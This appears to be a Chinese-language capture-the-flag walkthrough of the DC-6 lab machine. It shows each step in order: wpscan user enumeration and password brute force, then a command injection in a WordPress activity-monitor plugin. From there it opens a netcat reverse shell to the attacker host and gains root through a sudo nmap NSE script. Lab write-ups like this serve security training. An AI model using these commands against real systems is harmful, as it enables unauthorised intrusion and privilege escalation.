Dc:6靶机渗透测试详细流程

本篇文章是DC靶机系列，针对的是靶机dc:6
在wmware加载成功之后并开启，建议把dc:6靶机的网络模式改为nat模式

使用的攻击机是kali。
1.信息收集
目标机和攻击机在一个网段内这里直接使用：arp-scan -l 扫描网段内存活主机。

找到dc6的IP地址后使用nmap：nmap -O 192.168.142.148 扫描开放的端口

发现目标开放了80端口和22端口 //80一般是Web服务，22端口一般是远程登陆端口
访问此IP的web服务，发现访问失败，url被解析成了http://wordy/，在系统hosts文件上添加解析：
vim /etc/hosts，进入后输入192.168.142.148 wordy并保存即可访问web端口



进入后发现该网站使用WordPress框架搭建，尝试使用WPscan扫描 //WPscan是kali默认自带的漏洞扫描工具，它使用Ruby编写，能够扫描多种安全漏洞，其中包括主题漏洞，插件漏洞和WordPress本身的漏洞。
接下来要找到网站后台登陆界面，使用dirb扫描目录：dirb http://wordy

进入http://wordy/wp-admin/user/admin.php 后发现可登陆的站点

使用：wpscan --url http://wordy/ -e u 尝试找到系统中的用户用于爆破后台登陆密码


将扫描出的五个用户存到文本wordyuser.txt中 //文件名自拟
使用密码本爆破：wpscan --url http://wordy -P wordpassword.txt -U wordyuser

扫描出密码后登陆站点寻找线索

寻找利用点，在测试后发现activity monitor目录的tools栏存在注入点，这里输入的命令会被传到后台解析，尝试使用burp suite来修改数据包

管道符后的命令执行了这里存在漏洞，尝试反弹一个shell，首先在kali攻击机上：nc -lvvp -7777监听7777端口

抓包后在管道符后输入：nc -e /bin/bash 192.168.142.129 7777 反弹shell

反弹成功，接下来用python输入：python -c ‘import pty;pty.spawn(“/bin/bash")’ 建立一个全交互的命令行

建立成功后进入home目录下寻找线索

发现该目录下有之前登陆网站后台的用户名:mark

检查发现mark文件夹下有things-to-do.txt文件打开后发现graham的账号密码，在前面的端口扫描中我们是知道22端口也是开放的，这里尝试ssh

登陆graham用户成功

在检查中发现jens文件夹中有压缩命令行，尝试运行
echo '/bin/bash' >> backups.sh //在文件中添加命令行
sudo ./backups.sh //运行失败，因为现在是graham用户
sudo -u jens ./backups.sh //-u 指定用户jens

发现jens可以免密码运行root权限下的nmap。此时想到nmap可以运行文件，写一个打开root shell的文件再让nmap运行即可拿到root权限

写一个root shell的文件 命令：echo 'os.execute("/bin/sh")' > getshell.nse
sudo nmap --script=getshell.nse 运行

打开root用户目录
cd /root
cat theflag.txt //此处的输入是没有回显的
发现flag